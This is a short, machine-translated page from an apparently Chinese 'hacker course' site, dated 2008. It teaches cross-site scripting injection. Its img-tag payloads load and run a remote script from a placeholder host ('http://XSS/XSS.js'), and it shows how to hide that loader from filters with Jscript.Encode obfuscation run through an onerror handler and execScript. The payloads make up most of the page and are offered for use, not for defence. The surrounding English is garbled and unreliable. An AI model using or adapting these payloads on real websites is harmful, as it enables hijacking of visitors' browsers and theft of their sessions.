You are here: hacking technology > hacker course > Content
Hot Articles
Recommend Articles
New Articles
How teaches you to insert JS again in XSS
  Add date: 09/23/2008   Publishing date: 09/23/2008   Hits: 7

<img src= " javascript: try {var s=document.createElement ('script'); s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){} “></img>

How does the character filter manages? Encrypts after Encode on invincible ~

Before has not encrypted:
<img src='#' XSS= " try {var s=document.createElement ('script'); s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}” onerror= " execScript (decodeURI (this.XSS), 'Jscript.Encode'); ” >

After the encryption:
<img src='#' XSS= " #@~^bQAAAA==OMX `7lMP/{NK^Es+UYcm.nmY+As+s+xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp? U N/vpNKmEs+ OR (W [Xcl22  xN; 4k^N `kbI81lDm4 `nbP8XCcAAA==^#~@ “onerror= " execScript (decodeURI (this.XSS), 'Jscript.Encode'); ” >

How heh heh ~ stimulation does ~ use you to test again, after must use normally also needs encodeURI processes a Encode encryption the code



Prev:Teaches you to use PHPWIND to obtain the manager password method Next:DNS deceit technology course

Comment:

Category: Home > hacker course